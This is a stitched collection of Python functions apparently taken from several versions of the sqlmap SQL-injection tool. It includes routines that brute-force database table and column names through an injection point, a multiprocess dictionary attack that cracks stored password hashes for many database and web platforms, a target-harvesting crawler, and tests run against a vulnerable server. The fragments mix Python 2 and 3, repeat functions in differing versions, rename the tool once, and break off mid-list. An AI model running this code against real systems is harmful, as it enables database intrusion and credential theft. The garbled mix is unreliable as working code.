def tableExistsThread(): while count[0] < length and kb.threadContinue: tbllock.acquire() table = safeSQLIdentificatorNaming(tables[count[0]]) count[0] += 1 tbllock.release() if conf.db and not conf.db.endswith(METADB_SUFFIX): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) iolock.acquire() if result and table.lower() not in items: retVal.append(table) items.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release()
def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release()
def __bruteProcessVariantA(attack_info, hash_regex, wordlist, suffix, retVal, proc_id, proc_count): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) count += 1 if current in hashes: for item in list(attack_info): ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif proc_id == 0 and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except Exception, msg: print msg warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass
def __bruteProcessVariantB(user, hash_, kwargs, hash_regex, wordlist, suffix, retVal, found, proc_id, proc_count): count = 0 rotator = 0 try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password = word, uppercase = False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: #only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif proc_id == 0 and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass
def smokeTest(): """ Runs the basic smoke testing of a program """ retVal = True count, length = 0, 0 if not checkIntegrity(): retVal = False for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if ( conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD) ): fullTableName = "%s%s%s" % ( conf.db, ".." if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else ".", table, ) else: fullTableName = table result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName)) ) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), unsafeSQLIdentificatorNaming(table), ) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), ) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release()
def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.countLock.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.countLock.release() else: kb.locks.countLock.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.ioLock.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.ioLock.release()
def vulnTest(): """ Runs the testing against 'vulnserver' """ retVal = True count, length = 0, 6 def _thread(): vulnserver.init(quiet=True) vulnserver.run() thread = threading.Thread(target=_thread) thread.daemon = True thread.start() for options, checks in ( ("--version", ("1.", "#")), ("--flush-session", ("Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "back-end DBMS: SQLite", "3 columns")), ("--banner --schema --dump -T users --binary-fields=surname --where 'id>3'", ("banner: '3", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("--all", ("5 entries", "luther", "blisset", "fluffy", "ming", "NULL", "nameisnull")), ("--technique=B --hex --fresh-queries --sql-query='SELECT 987654321'", ("single-thread", ": '987654321'",)), ("--technique=T --fresh-queries --sql-query='SELECT 987654321'", (": '987654321'",)), ): output = shellExec("python sqlmap.py -u http://%s:%d/?id=1 --batch %s" % (vulnserver.LISTEN_ADDRESS, vulnserver.LISTEN_PORT, options)) if not all(check in output for check in checks): retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def columnExistsThread(): while count[0] < length and kb.threadContinue: collock.acquire() column = safeSQLIdentificatorNaming(columns[count[0]]) count[0] += 1 collock.release() result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s)", (column, table))) iolock.acquire() if result: retVal.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release()
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): try: item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.WORDPRESS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): hash_ = hash_.lower() if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, hash_.decode("base64").encode("hex")), {}] elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}] elif hash_regex in (HASH.SSHA256,): item = [(user, hash_), {"salt": hash_.decode("base64")[32:]}] elif hash_regex in (HASH.SSHA512,): item = [(user, hash_), {"salt": hash_.decode("base64")[64:]}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {"salt": hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {"salt": hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {"salt": hash_[0:2]}] elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD): item = [(user, hash_), {"salt": hash_.split(':')[-1]}] elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): item = [(user, hash_), {"salt": hash_.split('$')[1]}] elif hash_regex in (HASH.WORDPRESS,): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:12]}] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) except (binascii.Error, IndexError): pass if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD,): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default='1') try: if choice == '2': message = "what's the custom dictionary's location?\n" dictPath = readInput(message) if dictPath: dictPaths = [dictPath] logger.info("using custom dictionary") elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) if os.path.splitext(dictPath)[1].lower() == ".zip": _ = zipfile.ZipFile(dictPath, 'r') if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % dictPath raise SqlmapDataException(errMsg) else: _.open(_.namelist()[0]) kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) # Algorithms without extra arguments (e.g. salt and/or username) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
def tableExists(tableFile, regex=None): result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException, errMsg tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.outputs = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.outputs: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in map(lambda x: (conf.db, x), threadData.shared.outputs): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
def crawl(target, post=None, cookie=None): if not target: return try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() threadData.shared.formsFound = False def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search( conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') tags += re.finditer( r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) tags += re.finditer( r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) for tag in tags: href = tag.get("href") if hasattr( tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[ 0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin( current, htmlUnescape(href)) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if (extractRegexResult( r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "" ).lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search( r"(.*?)\?(.+)", url) and not re.search( r"\?(v=)?\d+\Z", url ) and not re.search( r"(?i)\.(js|css)(\?|\Z)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: threadData.shared.formsFound |= len( findPageForms(content, current, False, True)) > 0 if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % ( threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout( "\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) _ = re.sub(r"(?<!/)/(?!/).*", "", target) if _: if target.strip('/') != _.strip('/'): threadData.shared.unprocessed.add(_) if re.search(r"\?.*\b\w+=", target): threadData.shared.value.add(target) if kb.checkSitemap is None: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " kb.checkSitemap = readInput(message, default='N', boolean=True) if kb.checkSitemap: found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) if not conf.bulkFile: infoMsg = "starting crawler for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. ramusql " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: if not (conf.forms and threadData.shared.formsFound): warnMsg = "no usable links found (with GET parameters)" if conf.forms: warnMsg += " or forms" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add( (urldecode(url, kb.pageEncoding), None, None, None, None)) if kb.targets: if kb.normalizeCrawlingChoice is None: message = "do you want to normalize " message += "crawling results [Y/n] " kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) if kb.normalizeCrawlingChoice: seen = set() results = OrderedSet() for target in kb.targets: value = "%s%s%s" % (target[0], '&' if '?' in target[0] else '?', target[2] or "") match = re.search(r"/[^/?]*\?.+\Z", value) if match: key = re.sub(r"=[^=&]*", "=", match.group(0)).strip("&?") if '=' in key and key not in seen: results.add(target) seen.add(key) kb.targets = results storeResultsToFile(kb.targets)
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( ("-h", ("to see full list of options run with '-hh'",)), ("--dependencies --deprecations", ("sqlmap requires", "third-party library", "~DeprecationWarning:")), ("-u <url> --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), ("-u <url> --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")), (u"-c <config> --flush-session --output-dir=\"<tmpdir>\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'",)), ("-m <multiple> --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")), ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), ("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), ("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind")), ("-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <base> --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)), ("-u <base64> -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)), ("-u <url> --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)), ("-u <url> --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"<root><param name=\\\"id\\\" value=\\\"1*\\\"/></root>\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <base> --flush-session --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har=<tmpfile> --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H \"id: 1*\" --tables -t <tmpfile>", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", 